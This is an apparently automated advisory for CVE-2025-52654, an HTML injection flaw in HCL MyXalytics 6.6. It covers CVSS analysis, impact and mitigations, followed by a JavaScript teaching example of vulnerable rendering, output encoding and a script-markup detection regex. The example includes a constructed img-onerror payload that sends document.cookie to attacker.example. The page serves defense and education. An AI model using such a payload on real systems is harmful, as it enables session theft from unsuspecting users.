
CVE-2025-52654: CWE-80 in HCL MyXalytics

Severity: Medium
Tags: vulnerability, CVE-2025-52654, CWE-80
Published: Fri Oct 03 2025 (10/03/2025, 18:11:20 UTC)
Source: CVE Database V5
Vendor/Project: HCL
Product: HCL MyXalytics

Description

A vulnerability in HCL MyXalytics allows HTML Injection. This issue affects HCL MyXalytics: 6.6.

AI-Powered Analysis

Last updated: 10/03/2025, 18:32:05 UTC

Technical Analysis

CVE-2025-52654 is a medium-severity HTML injection vulnerability in HCL MyXalytics version 6.6. It is classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page, "Basic XSS"): user-supplied input is written into a page without neutralizing the tags and attributes a browser treats as executable, so an attacker can inject arbitrary HTML and, through elements such as script tags or event-handler attributes, script that runs in the viewer's browser.

The CVSS v3.1 base score is 4.6 (Medium), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N. Read metric by metric: the attack is performed over the network (AV:N) with low complexity (AC:L); the attacker needs a low-privileged account on the application (PR:L), and a victim must interact with the injected content, typically by viewing the page that renders it (UI:R); scope is unchanged (S:U); confidentiality and integrity are affected to a limited degree (C:L/I:L) and availability is not (A:N). The PR:L plus UI:R pattern is characteristic of stored injection: an authenticated user plants the payload once, and other users are hit when they open the affected dashboard or report.

The advisory does not name the injection point or the affected parameter. Script execution in a victim's session can disclose data that user is allowed to see, capture session material the browser exposes to script (for example a session cookie that lacks the HttpOnly flag), perform actions with the victim's privileges, and alter displayed figures so that reports mislead the people who rely on them. No exploits are reported in the wild, and no patch had been published at the time of this analysis. The CVE was reserved on 2025-06-18 and published on 2025-10-03, so the disclosure is recent. Because MyXalytics is an analytics platform, the most likely targets are users who view shared dashboards and reports, and the most likely business effect is loss of confidentiality and trustworthiness of business intelligence data.

Potential Impact

For European organizations running HCL MyXalytics 6.6, the risk is to the confidentiality and integrity of analytics data and of user sessions. An attacker who holds a low-privileged account could plant content that runs script in the browsers of other users and with it read data those users are allowed to see, capture session material the browser exposes to script, or act on their behalf. Manipulated figures in dashboards and reports would undermine the decisions based on them. Availability is not affected, but leakage or silent alteration of business intelligence data carries reputational cost, and sectors that steer operations on analytics, such as finance, manufacturing and public administration, are the most exposed. Where the analytics include personal data, a confirmed exposure or manipulation may also trigger GDPR obligations.

Mitigation Recommendations

MyXalytics is a vendor product, so the root-cause fix, neutralizing script-related HTML in the affected output (input validation plus context-aware output encoding), can only come from HCL. Engage HCL support to obtain the fixed build and apply it promptly once released. Until then, the controls available to the operator are compensating ones.

The vector requires a low-privileged account (PR:L), so keep the set of accounts that can author content seen by others small and accountable: review account provisioning, remove stale or shared accounts, and grant content-creation rights only where the role needs them. Serve the application through a reverse proxy or WAF and, where it does not break the application (test on a non-production instance first), add a Content-Security-Policy that disallows inline script and restricts script sources; this limits what an injected payload can do but is not a substitute for the fix. Check that session cookies carry the HttpOnly and Secure flags so that injected script cannot read them. A WAF rule that rejects script-related markup (script tags, event-handler attributes, javascript: URLs) in the request fields of user-editable content is the closest customer-side equivalent of input validation; treat it as a speed bump, since blocklists of this kind can be bypassed. For detection, periodically review stored user-supplied content (report and dashboard names, descriptions, labels, comments) for HTML markup, and alert on requests whose bodies contain script-related tags or attributes. If a feature that accepts free-form text or HTML from users can be disabled or restricted without operational loss, do so temporarily. User awareness training offers little protection here, because a stored payload is delivered by the application itself when a user opens a legitimate dashboard.
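The following JavaScript is an added example, not HCL MyXalytics code, of the failure class behind CWE-80 described in the technical analysis and of the output encoding and content checks the recommendations above refer to. The widget renderer, the field and the payload are constructed for illustration; nothing is known from the advisory about how MyXalytics actually renders the affected content or which field is affected.

```javascript
// Added example (not HCL MyXalytics code): a CWE-80 HTML injection in a
// server-rendered analytics widget, the output encoding that removes it, and a
// check for script-related markup in stored content. All names are constructed.

// Vulnerable: a report title supplied by a low-privileged user is concatenated
// straight into the HTML sent to every viewer of the dashboard.
function renderWidgetVulnerable(title) {
  return `<div class="widget"><h2>${title}</h2></div>`;
}

// Output encoding for an HTML text context: the five characters that let text
// break out of a text node or a quoted attribute value. Attribute, URL and
// JavaScript contexts each need their own encoder; this one is not enough there.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hardened: same template, untrusted value encoded for the context it lands in.
function renderWidgetHardened(title) {
  return `<div class="widget"><h2>${escapeHtml(title)}</h2></div>`;
}

// Script-related markup in the CWE-80 sense: tags that load or run code, inline
// event-handler attributes, and javascript: URLs. Suitable for flagging stored
// fields or request bodies for review; as a blocklist it is bypassable (entity
// encoding, unusual tags), so it complements encoding rather than replacing it.
const SCRIPT_MARKUP =
  /<\s*\/?\s*(script|iframe|object|embed|svg|img|link|meta|form|base)\b|\bon[a-z]+\s*=|javascript\s*:/i;

function containsScriptMarkup(s) {
  return SCRIPT_MARKUP.test(String(s));
}

// Scan a set of stored records and return the ones that need a look.
function flagRecords(records) {
  return records.filter((r) => containsScriptMarkup(r.value));
}

// Constructed payload: no <script> tag at all, yet it executes because the
// broken <img> fires its onerror handler. This is how "HTML injection"
// becomes script execution in every viewer's browser.
const PAYLOAD =
  'Q3 revenue<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Constructed sample of stored dashboard fields, one of them malicious.
const SAMPLE_RECORDS = [
  { id: 101, field: 'widget.title', value: 'Q3 revenue (EMEA)' },
  { id: 102, field: 'widget.title', value: 'Churn <b>vs</b> plan' },
  { id: 103, field: 'widget.title', value: PAYLOAD },
  { id: 104, field: 'report.note', value: 'See javascript: console for details' },
];

console.log(renderWidgetVulnerable(PAYLOAD));
console.log(renderWidgetHardened(PAYLOAD));
console.log(flagRecords(SAMPLE_RECORDS).map((r) => r.id));
```

In the hardened output the payload survives as visible text (`&lt;img src=x onerror=...`) and the browser never sees a tag, which is the property a fix for this CVE has to deliver in every place the affected value is rendered. Record 102 is not flagged, because plain formatting tags are not script-related; record 104 is, because a javascript: URL is worth a human look even when it turns out to be harmless.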


Technical Details

Data Version: 5.1
Assigner Short Name: HCL
Date Reserved: 2025-06-18T14:03:06.891Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 68e014ac1485ec6038e2a7e2
Added to database: 10/3/2025, 6:23:40 PM
Last enriched: 10/3/2025, 6:32:05 PM
Last updated: 10/7/2025, 12:00:55 PM
